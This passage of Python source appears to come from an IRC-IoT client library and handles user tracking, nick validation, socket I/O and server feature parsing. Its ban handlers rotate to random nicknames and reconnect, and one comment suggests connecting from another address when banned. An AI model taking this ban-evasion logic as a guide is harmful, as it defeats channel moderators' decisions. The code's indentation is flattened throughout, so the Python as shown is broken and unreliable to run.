if my_anon != None:
return (True, an_bkey)
elif in_action == self.CONST.api_SET_BKEY:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, in_params, None, None, None, None)
return (True, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, in_params, \
None, None, None, None)
return (True, None)
elif in_action == self.CONST.api_GET_EKEY:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_ekey)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_ekey)
elif in_action == self.CONST.api_SET_EKEY:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
in_params, None, None, None, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, in_params, None, \
None, None, None, None)
elif in_action == self.CONST.api_GET_EKTO:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_ekto)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_ekto)
elif in_action == self.CONST.api_SET_EKTO:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, in_params, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, \
None, in_params, None, None)
elif in_action == self.CONST.api_GET_BKTO:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_bkto)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_bkto)
elif in_action == self.CONST.api_SET_BKTO:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, None, in_params, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, \
None, None, in_params, None)
elif in_action == self.CONST.api_GET_iMTU:
return (True, self.irc_MTU)
elif in_action == self.CONST.api_GET_iENC:
return (True, self.irc_encoding)
return (False, None)
#
# End of user_handler_()
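# A minimal usage sketch (the VUID value is made up): asking for the stored
# encryption key of a configured user,
#   my_ok, my_ekey = self.user_handler(
#     (self.irciot_protocol_version_(), self.irciot_library_version_()),
#     self.CONST.api_GET_EKEY, "c1", None)
# returns (True, key-or-None) when such a configured user exists,
# or (False, None) otherwise.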
def irciot_set_locale_(self, in_lang):
if not isinstance(in_lang, str):
return
self.lang = in_lang
my_desc = {}
try:
from PyIRCIoT.irciot_errors \
import irciot_get_common_error_descriptions_
my_desc = irciot_get_common_error_descriptions_(in_lang)
my_desc = self.validate_descriptions_(my_desc)
if my_desc != {}:
self.errors.update(my_desc)
except:
pass
my_desc = {}
try:
from PyIRCIoT.irciot_errors \
import irciot_get_rfc1459_error_descriptions_
my_desc = irciot_get_rfc1459_error_descriptions_(in_lang)
my_desc = self.validate_descriptions_(my_desc)
if my_desc != {}:
self.errors.update(my_desc)
except:
pass
#
# End of irciot_set_locale_()
def irc_set_password_(self, in_password):
self.__irc_password = self.copy_string_(in_password)
in_password = self.wipe_string_(in_password)
def irc_set_proxy_password_(self, in_password):
self.__irc_proxy_password = self.copy_string_(in_password)
in_password = self.wipe_string_(in_password)
def irc_tolower_(self, in_input):
return in_input.translate(self.CONST.irc_translation)
def irc_tomock_(self, in_input):
return in_input.translate(self.CONST.irc_transmocker)
def irc_get_list_(self, in_input):
if in_input == None:
return []
if isinstance(in_input, list):
return in_input
else:
return [ in_input ]
def is_irc_nick_(self, in_nick):
if not isinstance(in_nick, str):
return False
if len(in_nick) > self.CONST.irc_max_nick_length:
return False
return self.__irc_nick_matcher.match(in_nick)
def is_irc_channel_(self, in_channel):
if not isinstance(in_channel, str):
return False
return self.__irc_channel_matcher.match(in_channel)
def irc_compare_channels_(self, ref_channel, cmp_channel):
if not self.is_irc_channel_(ref_channel):
return False
if not self.is_irc_channel_(cmp_channel):
return False
return (self.irc_tolower_(ref_channel) \
== self.irc_tolower_(cmp_channel))
def irc_compare_nicks_(self, ref_nick, cmp_nick):
if not self.is_irc_nick_(ref_nick):
return False
if not self.is_irc_nick_(cmp_nick):
return False
return (self.irc_tolower_(ref_nick) \
== self.irc_tolower_(cmp_nick))
def irc_define_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return
self.__irc_nick = in_nick
self.irc_nick_old = in_nick
self.irc_nick_base = in_nick
if self.irc_run:
self.irc_send_(self.CONST.cmd_NICK + " " + in_nick)
def irc_get_nick_(self):
return self.__irc_nick
def irc_get_delta_(self):
return self.__delta_time
def irc_get_local_port_(self):
if self.is_ip_port_(self.__irc_local_port):
return self.__irc_local_port
else:
return None
def irc_check_mask_(self, in_from, in_mask):
str_from = self.irc_tolower_(in_from)
str_mask = self.irc_tolower_(in_mask).replace("\\", "\\\\")
for char in ".$|[](){}+":
str_mask = str_mask.replace(char, "\\" + char)
str_mask = str_mask.replace("?", ".")
str_mask = str_mask.replace("*", ".*")
irc_regexp = re.compile(str_mask, re.IGNORECASE)
my_result = irc_regexp.match(str_from)
if my_result != None:
if my_result:
return True
return False
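# For example (using a mask from irc_default_users above):
#   irc_check_mask_("FaceBot!~irc@faceserv1.nsk.ru",
#                   "FaceBot!*irc@faceserv*.nsk.ru")  -> True
# '*' matches any run of characters, '?' a single character, and the
# comparison uses the RFC 1459 case folding from irc_tolower_().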
def irc_track_cleanup_anons_(self):
for my_anon in self.irc_anons:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
an_vuid = "{:s}{}".format(self.CONST.api_vuid_tmp, an_id)
an_ok = False
for my_nick in self.irc_nicks:
(in_nick, my_mask, my_vuid, my_info) = my_nick
if my_vuid == an_vuid:
an_ok = True
if not an_ok:
self.irc_anons.remove(my_anon)
#
# End of irc_track_cleanup_anons_()
def irc_track_update_ucfgs_by_vuid_(self, in_vuid, \
in_ekey, in_bkey, in_lmid, in_ekto, in_bkto, in_omid):
if not isinstance(in_vuid, str):
return
# Configured users must be set up from the local config,
# but some of the fields may be missing; in that case
# the needed values will be taken from the network
for my_index, my_ucfg in enumerate(self.irc_users):
( my_id, my_mask, my_channel, my_opt, \
my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid ) = my_ucfg
my_vuid = self.CONST.api_vuid_cfg
my_vuid += "{:d}".format(my_id)
if in_vuid == my_vuid:
# Updating crypto keys only if they are not defined
if my_ekey == None and isinstance(in_ekey, str):
my_ekey = in_ekey
if my_bkey == None and isinstance(in_bkey, str):
my_bkey = in_bkey
if my_ekto == None and isinstance(in_ekto, int):
my_ekto = in_ekto
if my_bkto == None and isinstance(in_bkto, int):
my_bkto = in_bkto
# Only the last message ID can be updated in pipeline
if isinstance(in_lmid, str):
if isinstance(my_lmid, list):
if in_lmid not in my_lmid:
my_lmid.append(in_lmid)
if len(my_lmid) > self.irc_mid_pipeline_size:
del my_lmid[0]
else:
my_lmid = [ in_lmid ]
if isinstance(in_omid, str):
if isinstance(my_omid, list):
if in_omid not in my_omid:
my_omid.append(in_omid)
if len(my_omid) > self.irc_mid_pipeline_size:
del my_omid[0]
else:
my_omid = [ in_omid ]
my_cfgs = ( my_id, my_mask, my_channel, \
my_opt, my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid )
self.irc_users[my_index] = my_cfgs
break
#
# End of irc_track_update_ucfgs_by_vuid_()
def irc_track_update_anons_by_vuid_(self, in_vuid, \
in_mask, in_chan, in_opt, in_ekey, in_bkey, \
in_lmid, in_ekto, in_bkto, in_omid ):
if not isinstance(in_vuid, str):
return
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_id = my_re.group(1)
else:
return
my_ok = False
for my_index, my_anon in enumerate(self.irc_anons):
( an_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_anon
if my_id == an_id:
my_ok = True
if isinstance(in_mask, str):
my_mask = in_mask
if self.is_irc_channel_(in_chan):
my_chan = in_chan
if in_opt != None:
my_opt = in_opt
if isinstance(in_ekey, str):
my_ekey = in_ekey
if isinstance(in_bkey, str):
my_bkey = in_bkey
if isinstance(in_lmid, str):
if isinstance(my_lmid, list):
if in_lmid not in my_lmid:
my_lmid.append(in_lmid)
if len(my_lmid) > self.irc_mid_pipeline_size:
del my_lmid[0]
else:
my_lmid = [ in_lmid ]
if isinstance(in_ekto, int):
my_ekto = in_ekto
if isinstance(in_bkto, int):
my_bkto = in_bkto
if isinstance(in_omid, str):
if isinstance(my_omid, list):
if in_omid not in my_omid:
my_omid.append(in_omid)
if len(my_omid) > self.irc_mid_pipeline_size:
del my_omid[0]
else:
my_omid = [ in_omid ]
my_anon = ( an_id, my_mask, my_chan, my_opt, my_ekey, \
my_bkey, my_lmid, my_ekto, my_bkto, my_omid )
self.irc_anons[my_index] = my_anon
break
if not my_ok:
for my_anon in self.irc_anons:
if my_anon[1] == in_mask:
my_ok = True
if not my_ok:
my_lmid = None
my_omid = None
if isinstance(in_lmid, str):
my_lmid = [ in_lmid ]
if isinstance(in_omid, str):
my_omid = [ in_omid ]
self.irc_anons.append( ( my_id, in_mask, \
in_chan, in_opt, in_ekey, in_bkey, my_lmid,
in_ekto, in_bkto, my_omid ) )
#
# End of irc_track_update_anons_by_vuid_()
def irc_track_get_anons_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_id = my_re.group(1)
else:
return None
for my_anon in self.irc_anons:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
if my_id == an_id:
return my_anon
return None
#
# End of irc_track_get_anons_by_vuid_()
def irc_track_fast_nick_(self, in_nick, in_mask):
my_ok = True
for my_struct in self.irc_nicks:
if my_struct[0] == in_nick:
my_ok = False
if my_ok:
self.irc_track_add_nick_(in_nick, in_mask, None, None)
#
# End of irc_track_fast_nick_()
def irc_track_add_nick_(self, in_nick, in_mask, in_vuid, in_info):
if not self.is_irc_nick_(in_nick):
return
if in_nick == self.__irc_nick:
return
my_struct = self.irc_track_get_nick_struct_by_nick_(in_nick)
if my_struct == None:
self.irc_nicks.append((in_nick, in_mask, in_vuid, in_info))
else:
self.irc_track_update_nick_(in_nick, in_mask, in_vuid, in_info)
#
# End of irc_track_add_nick_()
def irc_track_update_nick_(self, in_nick, in_mask, in_vuid, in_info):
if not self.is_irc_nick_(in_nick):
return
if in_nick == self.__irc_nick:
return
for my_index, my_struct in enumerate(self.irc_nicks):
(my_nick, my_mask, my_vuid, my_info) = my_struct
# comparing of the masks will be here ...
# self.irc_check_mask_(in_from, in_mask)
if self.irc_compare_nicks_(my_nick, in_nick):
if isinstance(in_mask, str):
my_mask = in_mask
if in_vuid == None:
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
if isinstance(in_vuid, str):
my_vuid = in_vuid
if isinstance(in_info, str):
my_info = in_info
self.irc_nicks[my_index] = (in_nick, my_mask, my_vuid, my_info)
if self.irc_talk_with_strangers:
self.irc_track_update_anons_by_vuid_(my_vuid, \
my_mask, self.irc_channel, \
None, None, None, None, None, None, None)
break
#
# End of irc_track_update_nick_()
def irc_track_clear_anons_(self):
self.irc_anons = []
def irc_track_clear_nicks_(self):
self.irc_nicks = []
def irc_track_delete_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if self.irc_compare_nicks_(my_nick, in_nick):
self.irc_nicks.remove(my_struct)
if self.irc_talk_with_strangers:
self.irc_track_cleanup_anons_()
break
#
# End of irc_track_delete_nick_()
def irc_track_get_nick_struct_(self, in_position):
try:
my_struct = self.irc_nicks[in_position]
except:
my_struct = None
return my_struct
def irc_track_get_nick_struct_by_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if self.irc_compare_nicks_(my_nick, in_nick):
return my_struct
return None
def irc_track_get_nick_struct_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_vuid == in_vuid:
return my_struct
return None
def irc_track_get_nick_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_vuid == in_vuid:
return my_nick
return None
def irc_track_clarify_nicks_(self):
for my_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_struct
if my_mask == None or my_info == None:
self.irc_whois_nick_(my_nick)
if my_mask == None:
my_mask = ""
if my_info == None:
my_info = ""
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
break
#
# End of irc_track_clarify_nicks_()
def irc_cfg_get_user_mask_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_user = self.irc_users[ in_position ]
( my_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
return my_mask
except:
return None
#
# End of irc_cfg_get_user_mask_()
def irc_cfg_get_user_struct_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_struct = self.irc_users[ in_position ]
return my_struct
except:
return None
#
# End of irc_cfg_get_user_struct_()
def irc_cfg_get_vuid_(self, in_position):
if not isinstance(in_position, int):
return None
try:
my_user = self.irc_users[ in_position ]
( my_id, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
return "{:s}{:d}".format(self.CONST.api_vuid_cfg, my_id)
except:
return None
#
# End of irc_cfg_get_vuid_()
def irc_cfg_get_user_struct_by_vuid_(self, in_vuid):
if not isinstance(in_vuid, str):
return None
for my_user in self.irc_users:
if in_vuid == "{:s}{:d}".format( \
self.CONST.api_vuid_cfg, my_user[0]):
return my_user
return None
#
# End of irc_cfg_get_user_struct_by_vuid_()
def irc_cfg_check_user_(self, in_from, in_channel, \
irciot_parameters = None):
if not self.is_irc_channel_(in_channel):
return None
in_opt = None
in_ekey = None
in_bkey = None
in_lmid = None
in_ekto = None
in_bkto = None
in_omid = None
if irciot_parameters != None:
( in_opt, in_ekey, in_bkey, in_lmid, \
in_ekto, in_bkto, in_omid ) = irciot_parameters
for my_user in self.irc_users:
( my_uid, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, my_ekto, \
my_bkto, my_omid ) = my_user
if in_channel == "*" or \
self.irc_compare_channels_(in_channel, my_chan):
if self.irc_check_mask_(in_from, my_mask):
return "{:s}{:d}".format(self.CONST.api_vuid_cfg, my_uid)
return None
#
# End of irc_cfg_check_user_()
def irc_get_unique_temporal_vuid_(self, in_mask):
max_id = self.irc_last_temporal_vuid
tmp_id = random.randint(max_id + 1, max_id + 100)
my_id = max_id
for my_nick_struct in self.irc_nicks:
(my_nick, my_mask, my_vuid, my_info) = my_nick_struct
if not isinstance(my_vuid, str):
continue
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), my_vuid)
if my_re:
if my_mask == in_mask:
return my_vuid
my_id = my_re.group(1)
my_id = int(my_id)
if my_id > max_id:
max_id = my_id
self.irc_last_temporal_vuid = tmp_id
return "{:s}{:d}".format(self.CONST.api_vuid_tmp, tmp_id)
def irc_get_vuid_by_mask_(self, in_mask, in_channel):
if not self.is_irc_channel_(in_channel):
return None
my_vuid = self.irc_cfg_check_user_(in_mask, in_channel)
if my_vuid == None and self.irc_talk_with_strangers:
my_vuid = self.irc_get_unique_temporal_vuid_(in_mask)
return my_vuid
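# Note on VUIDs (virtual user IDs): a mask that matches a configured user
# yields a VUID built from the api_vuid_cfg prefix plus that user's ID,
# while (when irc_talk_with_strangers is enabled) an unknown mask gets a
# temporary VUID built from the api_vuid_tmp prefix plus a random number;
# the actual prefix characters are defined in the shared constants.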
def irc_get_vuid_type_(self, in_vuid):
if isinstance(in_vuid, str):
if len(in_vuid) > 0:
return in_vuid[0]
return None
def irc_get_useropts_from_user_struct_(self, in_user_struct):
if not isinstance(in_user_struct, tuple):
return []
if len(in_user_struct) < 4:
return []
my_opts = in_user_struct[3]
if not isinstance(my_opts, list):
my_opts = [ my_opts ]
return my_opts
def irc_disconnect_(self):
try:
self.irc.shutdown(2)
except:
pass
self.stop_ident_()
self.irc_track_clear_nicks_()
self.irc_track_clear_anons_()
try:
self.irc.close()
except:
pass
#
# End of irc_disconnect_()
def irc_reconnect_(self):
if not self.irc_run:
return
self.irc_disconnect_()
self.to_log_(self.errors[self.CONST.err_CLOSED] + ", " \
+ self.errors[self.CONST.err_RECONN] + "IRC" \
+ self.errors[self.CONST.err_TRY].format( \
self.__irc_recon) + " ...")
my_mult = self.__irc_recon
if self.__join_retry > self.__join_retry_max:
my_mult = 1
sleep(self.CONST.irc_first_wait * my_mult)
self.__irc_recon += 1
if self.__irc_recon > self.CONST.irc_recon_steps:
self.__irc_recon = 1
self.__irc_silence = 0
self.irc = self.irc_socket_(self.irc_server)
def irc_send_(self, irc_out):
if not isinstance(irc_out, str):
return -1
try:
if irc_out == "":
return -1
if self.irc_debug:
self.to_log_(self.errors[self.CONST.err_SENDTO] + "IRC: [" \
+ irc_out.replace('\r','\\r').replace('\n','\\n') + "\\n]")
self.irc.send(bytes(irc_out + "\n", self.irc_encoding))
sleep(self.CONST.irc_micro_wait)
irc_out = ""
return 0
except socket.error:
self.to_log_("socket.error in irc_send_() ...")
return -1
except ValueError:
self.to_log_("ValueError in irc_send_() ...")
return -1
except:
return -1
#
# End of irc_send_()
def irc_recv_(self, recv_timeout):
try:
time_in_recv = datetime.datetime.now()
ready = select.select([self.irc], [], [], 0)
my_timerest = recv_timeout
while ready[0] == [] and my_timerest > 0 and self.irc_run:
my_timeout = my_timerest % self.CONST.irc_latency_wait
if my_timeout == 0:
my_timeout = self.CONST.irc_latency_wait
ready = select.select([self.irc], [], [], my_timeout)
if not self.irc_run:
return (-1, "", 0)
if not self.__irc_queue[self.CONST.irc_queue_output].empty():
break
my_timerest -= my_timeout
time_out_recv = datetime.datetime.now()
delta_time_in = self.td2ms_(time_out_recv - time_in_recv)
delta_time = self.CONST.irc_default_wait
if recv_timeout < self.CONST.irc_default_wait:
delta_time = 0
if delta_time_in < recv_timeout:
delta_time = recv_timeout - delta_time_in
if delta_time_in < 0:
delta_time = 0
if ready[0] and self.irc_run:
irc_input = self.irc.recv(self.CONST.irc_buffer_size \
).decode(self.irc_encoding, 'ignore')
if irc_input != "":
if self.irc_debug:
self.to_log_("Received from IRC: [" \
+ irc_input.replace('\r',"\\r").replace('\n',"\\n\n").rstrip() + "]")
return (0, irc_input, delta_time)
return (-1, "", delta_time)
return (0, "", delta_time)
except socket.error:
return (-1, "", 0)
except ValueError:
return (-1, "", 0)
#
# End of irc_recv_()
def irc_pong_(self, irc_input):
irc_string = irc_input.split(":")
ret = self.irc_send_("{} {}\r".format( \
self.CONST.cmd_PONG, irc_string[1]))
return ret
def irc_quit_(self):
ret = self.irc_send_("{} :{}\r".format( \
self.CONST.cmd_QUIT, self.irc_quit))
sleep(self.CONST.irc_latency_wait)
return ret
def irc_umode_(self, in_channel, in_nicks, in_change, in_umode):
if not self.is_irc_channel_(in_channel):
return None
if isinstance(in_nicks, str):
my_nicks = [ in_nicks ]
elif isinstance(in_nicks, list):
my_nicks = in_nicks
else:
return None
my_str = ''
for my_nick in my_nicks:
if not self.is_irc_nick_(my_nick):
return None
my_str += in_umode
for my_nick in my_nicks:
my_str += ' ' + my_nick
ret = self.irc_send_("{} {} {}{}\r\n".format( \
self.CONST.cmd_MODE, in_channel, in_change, my_str))
return ret
#
# End of irc_umode_()
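# For example, irc_op_("#irc-iot", ["alice", "bob"]) below sends
#   "MODE #irc-iot +oo alice bob"
# and irc_devoice_("#irc-iot", "alice") sends "MODE #irc-iot -v alice"
# (the channel and nicks here are illustrative only).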
def irc_op_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_add, self.CONST.irc_umode_op)
def irc_deop_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_del, self.CONST.irc_umode_op)
def irc_voice_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_add, self.CONST.irc_umode_voice)
def irc_devoice_(self, in_channel, in_nicks):
return self.irc_umode_(in_channel, in_nicks, \
self.CONST.irc_mode_del, self.CONST.irc_umode_voice)
def irc_extract_single_(self, in_string):
try:
irc_single = in_string.split()[3]
except:
return None
return irc_single
def irc_extract_nick_mask_(self, in_string):
try:
my_mask = in_string.split(' ', 1)[0][1:]
my_nick = my_mask.split('!', 1)[0]
except:
my_mask = "!@"
my_nick = ""
return (my_nick, my_mask)
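# For example, for the raw line (nick and host are illustrative)
#   ":alice!~user@host.example PRIVMSG #irc-iot :hello"
# irc_extract_nick_mask_() returns ("alice", "alice!~user@host.example")
# and irc_extract_message_() below returns "hello".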
def irc_extract_message_(self, in_string):
try:
irc_msg = in_string.split( \
self.CONST.cmd_PRIVMSG, 1)[1].split(':', 1)[1]
return irc_msg.strip()
except:
return None
def irc_extract_code_params_(self, in_string):
try:
my_out = ""
my_idx = 0
for my_item in in_string.split(' '):
if my_idx == 1 and len(my_item) != 3:
return None
if my_idx > 2:
if my_out != "":
my_out += " "
my_out += my_item
my_idx += 1
return my_out
except:
return None
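# For example, for a numeric reply such as (server name illustrative)
#   ":irc.example.net 005 MyBot NICKLEN=30 NETWORK=IRC-IoT :are supported"
# irc_extract_code_params_() returns
#   "NICKLEN=30 NETWORK=IRC-IoT :are supported"
# i.e. everything after the numeric code and the target nick.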
def irc_whois_nick_(self, in_nick):
if not self.is_irc_nick_(in_nick):
return -1
ret = self.irc_send_(self.CONST.cmd_WHOIS + " " + in_nick)
return ret
def irc_who_channel_(self, in_channel):
if not self.is_irc_channel_(in_channel):
return -1
ret = self.irc_send_(self.CONST.cmd_WHO + " " + in_channel)
return ret
def irc_random_user_(self):
return ''.join( \
random.choice(self.CONST.irc_ascii_lowercase) \
for i in range(random.randint(3, 8)))
def irc_random_nick_(self, in_nick, in_force = False):
if not self.is_irc_nick_(in_nick):
return -1
random.seed()
irc_nick = self.irc_tomock_(in_nick)
if irc_nick == in_nick:
irc_nick = "{}{:d}".format(in_nick, random.randint(0, 999))
if self.__join_retry > 2 or in_force:
nick_length = random.randint(2, self.irc_nick_length)
irc_nick = random.choice(self.CONST.irc_nick_first_char)
irc_nick += ''.join( \
random.choice(self.CONST.irc_nick_chars) \
for i in range(nick_length - 1))
ret = self.irc_send_(self.CONST.cmd_NICK + " " + irc_nick)
self.irc_nick_try = irc_nick
if ret == 0:
self.irc_nick_old = self.__irc_nick
self.__irc_nick = irc_nick
return ret
#
# End of irc_random_nick_()
def irc_socket_(self, in_server_name):
try:
my_server_ip = socket.gethostbyname(in_server_name)
if self.is_ipv6_address_(my_server_ip):
my_af_inet = socket.AF_INET6
else:
my_af_inet = socket.AF_INET
irc_socket = socket.socket(my_af_inet, socket.SOCK_STREAM)
if self.irc_ssl:
irc_socket = ssl.wrap_socket(irc_socket)
except socket.error:
self.to_log_("Cannot create socket for IRC")
return None
self.irc_server_ip = my_server_ip
self.update_irc_host_()
return irc_socket
def irc_connect_(self, in_server_ip, in_port):
if self.irc_ident:
self.start_ident_()
try:
self.irc.connect((in_server_ip, in_port))
except:
return
self.__irc_local_port = self.irc.getsockname()[1]
# self.irc.setblocking(False)
def irc_check_queue_(self, in_queue_id):
old_queue_lock = self.__irc_queue_lock[in_queue_id]
if not old_queue_lock:
check_queue = self.__irc_queue[in_queue_id]
self.__irc_queue_lock[in_queue_id] = True
if not check_queue.empty():
(irc_message, irc_wait, irc_vuid) = check_queue.get()
self.__irc_queue_lock[in_queue_id] = old_queue_lock
return (irc_message, irc_wait, irc_vuid)
else:
if old_queue_lock:
check_queue.task_done()
self.__irc_queue_lock[in_queue_id] = old_queue_lock
try:
sleep(self.CONST.irc_micro_wait)
except:
pass
return ("", self.CONST.irc_default_wait, self.CONST.api_vuid_all)
#
# End of irc_check_queue_()
def irc_add_to_queue_(self, in_queue_id, in_message, in_wait, in_vuid):
old_queue_lock = self.__irc_queue_lock[in_queue_id]
self.__irc_queue_lock[in_queue_id] = True
self.__irc_queue[in_queue_id].put((in_message, in_wait, in_vuid))
self.__irc_queue_lock[in_queue_id] = old_queue_lock
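# A minimal usage sketch (the message text is made up): queueing an outgoing
# message for the main loop,
#   self.irc_add_to_queue_(self.CONST.irc_queue_output, "some text",
#     self.CONST.irc_micro_wait, self.CONST.api_vuid_all)
# simply stores the (message, wait, vuid) tuple on the corresponding Queue,
# guarded by the matching __irc_queue_lock flag.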
def irc_check_and_restore_nick_(self):
if self.__irc_nick != self.irc_nick_base:
if self.irc_send_(self.CONST.cmd_NICK \
+ " " + self.irc_nick_base) != -1:
self.irc_nick_old = self.__irc_nick
self.__irc_nick = self.irc_nick_base
def irc_umode_by_nick_mask_(self, in_nick, in_mask, in_vuid):
if self.irc_get_vuid_type_(in_vuid) == self.CONST.api_vuid_cfg:
my_user = self.irc_cfg_get_user_struct_by_vuid_(in_vuid)
if my_user == None:
return
my_opts = self.irc_get_useropts_from_user_struct_(my_user)
if self.CONST.irc_aop in my_opts:
self.irc_op_(self.irc_channel, in_nick)
if self.CONST.irc_avo in my_opts:
self.irc_voice_(self.irc_channel, in_nick)
# CLIENT Hooks:
def func_feature_network_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if in_string not in [ "", None ]:
my_string = in_string
my_max = self.CONST.irc_max_network_name_length
if len(in_string) > my_max:
my_string = in_string[:my_max]
if not self.CONST.irc_default_network_tag in my_string:
self.to_log_(self.errors[self.CONST.err_NOT_IRCIOT_NET].format( \
my_string))
self.irc_network_name = my_string
return (in_ret, in_init, in_wait)
def func_feature_wallchops_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__wallchops = True
return (in_ret, in_init, in_wait)
def func_feature_topiclen_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_len = int(in_string)
if my_len > 0 and my_len < self.CONST.irc_max_topic_length:
self.irc_topic_length = my_len
except:
pass
return (in_ret, in_init, in_wait)
def func_feature_nicklen_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_len = int(in_string)
if my_len > 0 and my_len < self.CONST.irc_max_nick_length:
self.irc_nick_length = my_len
except:
pass
return (in_ret, in_init, in_wait)
def func_feature_whox_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__whox = True
return (in_ret, in_init, in_wait)
# incomplete
def func_featurelist_(self, in_args):
''' RPL_ISUPPORT handler '''
(in_string, in_ret, in_init, in_wait) = in_args
my_string = self.irc_extract_code_params_(in_string)
if my_string == None:
return (in_ret, in_init, in_wait)
my_string = my_string.split(':')[0]
for my_item in my_string.split(' '):
if my_item != "":
my_split = my_item.split('=')
my_param = ""
my_feature = my_split[0]
if len(my_split) == 2:
my_param = my_split[1]
for irc_pack in self.irc_features:
(irc_feature, featt_type, irc_function) = irc_pack
if irc_function != None:
if my_feature == irc_feature:
if featt_type == self.CONST.featt_EMPTY \
and my_param != "":
continue
if featt_type == self.CONST.featt_NUMBER \
and not my_param.isdigit():
continue
if featt_type in [ self.CONST.featt_STRING, \
self.CONST.featt_FLAGS ] and my_param == "":
continue
irc_args = (my_param, in_ret, in_init, in_wait)
(in_ret, in_init, in_wait) = irc_function(irc_args)
return (in_ret, in_init, in_wait)
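  #
  # Illustrative note (assumed example, not taken from this source): a
  # typical RPL_ISUPPORT (005) line looks roughly like
  #   :irc.example.net 005 mynick NICKLEN=30 TOPICLEN=307 NETWORK=ExampleNet :are supported by this server
  # func_featurelist_() above splits the parameter section into "KEY=value"
  # items and dispatches each one to its handler from self.irc_features.
  #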
def func_nick_in_use_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if self.irc_random_nick_(self.irc_nick_base) == 1:
return (-1, 0, in_wait)
return (in_ret, in_init, in_wait)
def func_restore_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__irc_nick = self.irc_nick_old
return (in_ret, 3, in_wait)
def func_bad_ping_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
    # This is not guaranteed by the RFC, but the last word of the
    # server's comment may carry the parameter expected by the PONG
my_split = in_string.split(' ')
self.irc_pong_(my_split[-1])
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_not_reg_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
#if self.irc_random_nick_(self.__irc_nick) == 1:
# return (-1, 0, in_wait)
return (in_ret, 1, self.CONST.irc_default_wait)
def func_registered_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, 3, self.CONST.irc_default_wait)
def func_banned_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if self.__join_retry > 1:
if self.__join_retry > self.__join_retry_max:
        # At this point we may have been banned by username; ideally
        # we would determine that for certain, and possibly connect to
        # another server or from a different IP address
self.irc_reconnect_()
return (-1, 0, in_wait)
if self.__nick_pause > 0:
self.__nick_pause -= 1
elif self.irc_random_nick_(self.__irc_nick) == 1:
return (-1, 0, in_wait)
return (in_ret, 3, self.CONST.irc_default_wait)
def func_on_kick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, 3, self.CONST.irc_default_wait)
